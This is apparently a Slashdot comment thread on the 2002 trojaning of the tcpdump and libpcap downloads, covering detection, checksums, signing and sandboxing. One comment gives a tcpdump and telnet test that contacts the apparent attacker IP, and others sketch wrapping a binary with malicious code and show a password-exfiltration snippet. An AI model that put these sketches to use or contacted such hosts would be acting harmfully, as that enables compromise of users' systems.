So why would they go to the trouble to do the "Reflections on Trusting Trust" thing to trojan their compilers? Even if they did trojan their compilers, the trojan might be known to only a small number of people. Hypotheteical example: one small group writes the back end code generation library of the compilers and gives that library in binary form to other compiler groups within the beast. In this scenerio, only a small number of people would know about the trojaned compilers, all compiliers would be affected, and there is no reason to disguise it in the source code.

Re:Isn't a Trojan a kind of condom?

[gosand]

Somebody's been messing around there, don't you think?

Mod down/burn karma?
Mod down/burn karma?
Mod down/burn karma?

Burn Karma.

I had a complete flame composed, but then realized that you honestly can't be this ignorant, and must have meant this to be funny. If this was a serious comment, then you really should hang your head in shame. (actually, you should either way)

Sandbox Your Applications

[gehirntot]

Lately, we have seen many trojaned distributions. To prevent these problems from affecting us in the future, we need to use cryptographic signatures as part of software distribution. Otherwise, we never know if a particular piece of software is authentic or not. Signature checking needs to be part of the installation process. I believe that Debian's aptget is one of the few tools that actually does this.

In the meanwhile, I suggest that you run all your untrusted software in a sandbox like Systrace which is available for the BSDs and Linux.

This screenshot shows Dug Song detecting the trojan in the Fragroute distribution. Systrace allows you to run completely untrusted applications in a sandbox. The security policy is created on the fly with the user deciding what an application is allowed to do.

We need to be much more careful about the software that we run.

a quick test to see if your hit

login as root (or whoever can run tcpdump)

tcpdump -n host 212.146.0.34 &
telnet 212.146.0.34 1963

if tcpdump sees the connection since it isn't ignoring port 1963, if you don't see the connection, then your tcpdump is ignoring port 1963

and well, its always nice to /. your local rooted base.
the people at 212.146.0.34 should change it to something like /usr/bin/tcpd echo 'A' (i think that was the quit code)

if this test is wrong, well, so be it, i'm still new at this linux thing, but i'm better at linux then i am at spelling (boy, i should be an /. editor)
--Anonymous Coward

Early news from tcpdump.org

[fenner]

I moved the binaries on the tcpdump.org web site, so that the "download" links won't work.

"ls -c" says that the modified binaries were installed at Nov 11 10:14:00 2002 GMT.

Preliminary inspection says that the CVS repository is O.K.

Re:Early news from tcpdump.org

[fenner]

The distributions from sourceforge are safe. See

http://www.sourceforge.net/projects/tcpdump/ http://www.sourceforge.net/projects/libpcap/

The MD5s of safe versions that HLUG provided appear to be correct; my own MD5 says:

MD5 (tcpdump-3.7.1.tar.gz) = 03e5eac68c65b7e6ce8da03b0b0b225e
MD5 (libpcap-0.7.1.tar.gz) = 0597c23e3496a5c108097b2a0f1bd0c7

www.tcpdump.org

[kludge99]

Interesting that there is no mention of this on the tcpdump.org website, one would think they would at least post something about it.

_NSA backdoor

[Martin+S.]

Don't think for a second that Microsoft hasn't put back

Microsoft *have* inserted a backdoor into the CryptoAPI for the NSA.

How did this get added?

[rot26]

I know this is a stupid question but I don't understand how this ended up in the distribution in the first place.

Re:How did this get added?

[Ektanoor]

Well, tcpdump.org guys may be the best to answer this question but there are some usual ways to do it:

A: Break into the Web site, get privileges and change the source.

B: Play the dirty contributor, add the torjaned code during development.

C: Play the good coder, get popularity and in last moment change the hat.

D: Play the jerk coder, make some silly debugs and leave the backdoor open in the distro.

D is probably the most inoccent. However it is not unusual as it seems. We have some good examples of debug backdoors left by well intended developers or less scruplous vendors.

B and C are a risk. You have to leave some tracks behind before you play dirty. It demands brians and some guts to do it. And it demands that you care for not being catched. However, these situations are not impossible.

A is the most usual of all. Breaking sites or users responsible for them has been the most usual, experienced and well-proved tendency of all. Besides, the one that gives the best results. You may be a super-hacker, creating a super-tool and hoping for a super-world out of your super-work. But you are not God All-Mighty.

Everyone has its strong sides and weak ones. It is very frequent to see that if one is a developer, then things concerning system and network administration are exactly his weak sides. The same goes for admins and development, example: me. I may be a good sysadmin and most people consider me as such. However, if I write a few pieces of code I usually get the reaction: "Uh, oh, hmmm... well I understand what you trying to do but leave to me that thing, ok?"

The problem why so many programs are being broken is not a problem of developers as developers. It is a problem of system administration, for which they may as far as I am from development of such tools like tcpdump. The solution to this problem is that main developers should start to care about gathering not only coders but also admins. However this may not be a solution for every ill. It may turn into into a new sphere. Imagine some ubercracker being invited as admin for some major site...

Date of Trojan is after Nov 1, 2002

[Skjellifetti]

I downloaded and installed libpcap and tcpdump on Nov 1. The versions I have came from tcpdump.org. md5sum shows that they have the correct checksum and not the trojaned checksum as reported on the Houston LUG page. A grep of the sources for the port number and ip found in the trojan reports null. It looks like the trojan files were placed on tcpdump.org after Nov 1, 2002.

phew? --- just how carefully did you read? :-)

[fw3]

if the sniffer is trojanized, then it could possible hide such "activities". I actually read the article and it however seems that it was not the case here... phew :-)

From the article: Gencode.c is modified to force libpcap to ignore packets to/from the backdoor program, hiding the backdoor program's traffic.

MD5 checks work nicely. Sure pgp in theory is better but since md5's are cached locally, and a helluva lot faster to check the chances that they will actually be used and verified are seemingly quite good.

Which is to say in practice MD5 has caught rather a lot of these problems, and in quite timely manner.

As irrelevant as various source-distributions (e.g. lunar, source-mage and Gentoo) are at present in other respects, they make a nice 'canary' in the coal mine :-).

Re:phew? --- just how carefully did you read? :-)

[Codifex+Maximus]

MD5's and source tarballs/binaries should be under the protection of tripwire or some other system guardian. GPG signatures are a good way of protecting things too.

But just bare MD5s are not enough. You must protect the MD5's from being modified to pass the trojans. All source and binaries available for download from a trojaned or rooted site must be considered suspect until they pass a diff on untrojaned source.

I know I'm thinking out loud here but this is how I understand the problem. Correct me if I'm wrong.

P.S. Time to get a good packet sniffer!

Coincidence

[thasmudyan]

I don't mean to troll (and I hear you say "yeah but you are") BUT quite a few project sites seem to have been infused with trojaned downloads over the last few months. Actually makes you think if there is a certain person or organization behind this? Considering the fact that news like this give these projects a bad security reputation, which counter-balances the built-in security breaches of a certain commercial software giant just nicely. Just a paranoid thought, don't take it too seriously though (I know you won't but still).

Holes in open source?

[phorm]

Did those virii come distributed with the product? Now you're going to tell me there are ABSOLUTELY NO possible security holes in open source software, ever right? Go on...

Ignoring the fact that installing certain operating system components are often worse on your computer than a virus (by installing this service pack, we may enter your computer)...

Nothing is 100% secure, and nobody ever said linux is (or not anyone intelligent, anyways). However, tallies of response time when a breach is found, and often the time in finding such a breach, are the factors at hand. You'll certainly not see MS yelling out "hey, we were hacked, check your software people," but instead something more like a quiet, um... something wrong... here patch... you fix.

And yes, lots of MS tools come with bugs in them that leave your computer so open that you might as well just invite half the web for a party. Once MS gets the patch out, if you're a decently intelligent admin/user, you can fix things up to plug the hole, or meanwhile just disable affected components,etc.

MS isn't all the problem, idiots who don't patch up are also a problem (demonstrated by the continual code red attempts shown in my webserver logs), but at least when something goes wrong we hear about it, and can expect a solution shortly after discovery.

Centralized and De-centralized PGP server for OSS

[dr.Flake]

Maybe somebody has already posted this idea as a project on sourceforge..

There have been too many of these incidents lately, and it's giving OSS a bad odor. We must be carefull. Telling the rest of the world closed binaries are infected often as well does not help. The damage is already done.

This is my idea to prevent most of these jokers tricks.

In stead of placing the checksums next to the source on the same server we nead to place it some where safe. A number of centralized servers with a sole purpose to serve these sums, in several locations, on preferably differend operating systems. This combined with the use of eg PGP.

All distro's, for those who have not already, must apply a simple program ala portage and apt that checks against multiple PGP-key servers before the build commenses.

Now, how to make sure the admin of the project is the one signing the source on his machine.............

S/MIME

[nsayer]

... Or you could join the Thawte web of trust and use S/MIME. The advantage there is that even if you do nothing more than sign up, your e-mail address is verified to belong to you. That alone is more rigorous verification than anything you're guaranteed with a PGP key. Get notarized twice, and your certificate can have your name in it, and those who get e-mail from you will know *exactly* what identity assurance the signature implies. The same can't be said with a signed PGP key. Plus with S/MIME, there is a key expiration mechanism, which insures that the key can't (reasonably) be brute-forced before it becomes useless.

S/MIME support is also more widespread. Why does that matter? Because more folks would be in a position to verify the signature. If you put a link on a download page to an S/MIME message with a mime-type of message/rfc822, browsers that support S/MIME (at least netscape, mozilla, I believe IE) will verify the signature and display the contents with a nice "signed" icon. The contents of the message would be the MD5 sums of the files.

Re:Same with (Free)BSD port system

[mjh]

Considering that gentoo's portage system is based off of the BSD ports system that's not surprising.

teaser...

[zogger]

...well? Please to release the info and name the bank and name the program. You are FOR crooks or AGAINST crooks, and releasing the info of this backdoor is a good thing to do. If it's really there, it most likely is *illegal* so any sort of nondisclosure noise is null and void, AFAIK. You DON'T have to cover up illegalities, in fact you are supposed to report them. This bank and it's bogus officers and "bosses" needs to see the light of day in a fed courtroom.

Automate the process?

[Rotten]

Is there any tool to analyze source code as an antivirus scans a binary file?

For example, in this case, the program is running an external app and making changes to a system file.

This is the first kind of thing I would see if I audit the code quickly.

Not quite so simple

[FallLine]

It takes much less than you seem to think:

rename the target binary 'program' as 'program.lib'
Make a C program that first does the evil you want to do, then execv program.lib
Compile your program and put it instead of the original program executable.

It's not that simple. Sure, if all you're looking to do is execute some code and THEN give the user their expected interface, then that will work half-acceptably. However, you could not use this as a way to, say, discretely intercept logins and passwords, transfer account balances, read someone's database, or what have you since all of that requires you to intercept things and still provide the user with acceptable responses (at least if you wish to avoid detection for more than a couple runs). Now you might attempt to come up with some elaborate scheme to act as an interactive go-between between the actual application and the your trojan, but then you've greatly increased the complexity and the odds of detection.

So, you see, there is no difference security-wise.

No. There is a huge difference.

Re:Not quite so simple

[FallLine]

I could. Almost in exactly the same way I would do adding a backdoor to an open-source program. From my evil code at the beginning I can read files and databases, redirect/duplicate network trafic, and so on. Truly, I might not be able to interact with the original code (not without some clever trick, anyway), but this is not needed to steal secrets: a password is not generated inside the program: it comes from outside (and I can intercept that) and often go outside(and I can intercept that).

While I admit that you would have some flexibility there, it is not all that you crack it up to be. For instance, on a multiuser system where you're connecting to a remote database you would have a hard time intercepting keystrokes, asking the user to follow a subtly different path (i.e., enter their administrator password) or what have you. Even on a database that is local and that you have read access to, you would have to either have legitimate access through the daemon or know how to parse it (or just send the whole damn thing)...but you get the point. It's often more complicated than just grepping /etc/passwd.

On the other hand, cleverness shall be applied also to place a backdoor in open source programs: or do you think that something like:
gets(password); send(socket, password, strlen(password)) would not be spotted the same second in which it is submitted in the CVS of some open source program?

I recognize that it would require some cleverness to bypass significant skilled human inspection. However, there are many areas of many open source programs that are not that closely inspected. I would venture to say the programs that are inspected closely are but a select few and those that aren't are at real risk. The existence of number of exploitable (supposed) bugs in reasonably popular open source code for an extended period of time is about all the confirmation that one needs that it can be done (if a true, but grave, mistake can pass inspection, then certainly someone actively decieving could go further). Furthermore, even if the code is 100% clean when it leaves the distribution servers, the very open source nature of that code, whether or not it came with a backdoor, still presents a much softer target for the disgruntled sysadmin, hacker, or what have you that wishes to install one of their own. In other words, just because the official code is clean does not mean that the binary is. (Although one can certainly say the same for proprietary/binary code, there is a much higher barier to entry...at least to do anything non-trivial and non-obvious with)

This is called spin...

[sheldon]

This is great, you've learned how to spin an argument.

Not only have you used the cliche "Well they aren't any better either...", you've even taken one step further and declared this weakness as your greatest strength.

Although to be an expert spin-meister you should have blamed this on Microsoft some how. Work on it, get back to us. Maybe we can get you a job at the Whitehouse if the tech market continues to flounder.

Re:This is dreadful

[fliplap]

Did anyone pay you for the trojan in Borlands Interbase? How sure are there's no trojan in Microsoft software? Would you know if there was? I'm aware you're just trolling, but keep in mind, the Interbase hole wasn't discovered for 6 YEARS when Borland open sourced it. Btw, no one ever said there was no security holes in open source software.

Re:who needs what? who needs to protect us?

[Zapdos]

I protect myself, which I can. Nobody can (or even wants to) stop me from using or changing anything on my pc, and a trojan will have problems with a good filewall.

Speaking of windows, I had to run ad-aware on my wife's "completely updated" XP box yesterday. I hate the virus company that makes gain. In fact there are quite a few websites that will install this and simular spyware on your "safe" OS.

I do realize that my firewall will stop gain from talking, but when gain cannot talk to its home it will slow your windows box to the point of being unusable. BTW she has never had any gain supported software installed.

When?

[BitHive]

Maybe I'm retarded, but the articles do not mention when they think the trojan was introduced. Does anyone know?

DeMorgan's Law

[srichman]

I mean, really, who writes code like this!?

if (!(!buf || !*buf)) {

We have a tricky tricky trojan writer on our hands. With obfuscation like this, it's a wonder the trojan was found at all...

Re:DeMorgan's Law

[SkewlD00d]

lol!!!

if(buf && *buf) { /* if buf is a string w/ length > 0 */

yeah, i love the descriptive variable names too.

and the malloc(1) statement followed by an out-of-bounds strcpy() over it. a good code profiler prog woulda caught it.

maybe mandatory documentation justifying every line would help.

you sir

[bani]

are either:

1) an ignorant fuckwit

or

2) a lying fuckwit

well, which one is it?

tcpdump.org was running an old version of NetBSD

[flynn_nrg]

Check this post to the netbsd-users mailing list (emphasis mine) :

From: David Maxwell
To: Stefan Schumacher
Cc: netbsd-users@netbsd.org
Subject: Re: Trojans in libpcap and tcpdump
Date: Wed, 13 Nov 2002 14:39:05 -0500
Sender: netbsd-users-owner@netbsd.org
User-Agent: Mutt/1.4i

On Wed, Nov 13, 2002 at 06:52:38PM +0100, Stefan Schumacher wrote:
> Hi there,
>
> report was given that trojans were detected in libpcap and tcpdump.
>
> http://hlug.fscker.com/
>
> I fetched tcpdump and libpcap and took a look in the sources, seems so as
> if we IMHO are not affected.

That is correct.

I've been at the console of the tcpdump.org server today, working with
Michael Richardson to investigate the problem. He will release a
statement on the details at some point. The system was not running an
up to date version of NetBSD, so there is no indication that users with
up to date systems are vulnerable to some new bug.

The trojan was installed within the last two days. The signatures in
pkgsrc are eight _months_ old. Users installing from pkgsrc (source, or
binary packages) could not be affected by this trojan without
specifically overriding the incorrect signature on the distribution
file.

Michael's contact information is listed in the whois entry for the
tcpdump.org domain, but as far as I know, he did not receive a call
about this issue, it was slashdotted.

--

Wrong

[0x0d0a]

Because there only needs to be *one* person out there who *does* look at the diffs and catches the thing. *Not* every person needs to catch the thing.

Furthermore, analysis of what the thing is doing is much easier with open source.

Correct

[0x0d0a]

Apparently, it was less than one day.

As someone else pointed out, the closed-source Interbase (DBMS) contained a trojan for over six years which was only found after it was open-sourced.

...And later moderators can't fix it!

[Jetson]

This apparently misleading (albeit well-intentioned) comment gets modded +4 interesting, meaning that almost everyone will see this poor guy's name.

All the replying posts pointing out that it's a phone company/ISP and it's almost certainly nothing to do with this chap are at 2 or below, meaning that many people won't see them and this individual's name is now besmirched.

The sad part of this is the fact that we (people who have moderator points to give away) can't really fix the problem even after we're told about it. I could go back and mod down the misleading post, but then some metamoderator would see that I modded down what appears at face value to be an "interesting" post and I would be the one who was bitch-slapped for abusing my moderator points. All we can really do is mod up the replies, making the whole thread +5 in order to dilute the bad moderation.

There may be people on /. who...

[EnlightenmentFan]

...don't understand the ins and outs of Trojans (another joke). But why would you want to spend time writing flames for people who don't share your own brand of uber-geekery? Presumably those of us who spend time here do so in pursuit of some nerdy interest of our own.

Re:There may be people on /. who...

[gosand]

Presumably those of us who spend time here do so in pursuit of some nerdy interest of our own.

Then why would you comment on something that you knew nothing about?

Think about that for a second.

And I hardly think it is uber-geekery to be able to make the connection between the word "trojan" and "trojan horse" when referring to malicious code that was snuck into other code.

Developers:

[rweir]

Go to gnupg.org and install gpg. Generate a keypair and put your public key up on wwwkeys.pgp.net. Whenever you meet another developer, sign each others keys. When you release a tarball, FUCKING SIGN IT and put up instructions telling people how to verify it. This sort of thing does not have to happen. The tools are there to prevent anyone ever trojaning an FTP server again. You will have to do this eventually or no one will trust your server enough to download your software, so why not start now? GO AND FUCKING START.
</rant>

Sorry about that, but how many times does this have to happen? It's trivial to prevent, but most people don't even try. Go and damn well start!

Re:who needs what? who needs to protect us?

[Zapdos]

A car is a wonderful example. If I have a burnt out headlamp I fix it. I have never really had any real car problems, because I am a good car "admin." I do my maintenance as scheduled. If I have a flat tire, I change it with a spare, and then go to see a tire shop, not the manufacturer. If you have a security problem with windows, do you wait for MS to show up, or do you use another options?

While I do think that the manufacturer is responsible for many of the problems, I do not have time to wait on the side of the road , for the manufacturer to show up and fix my flat tire.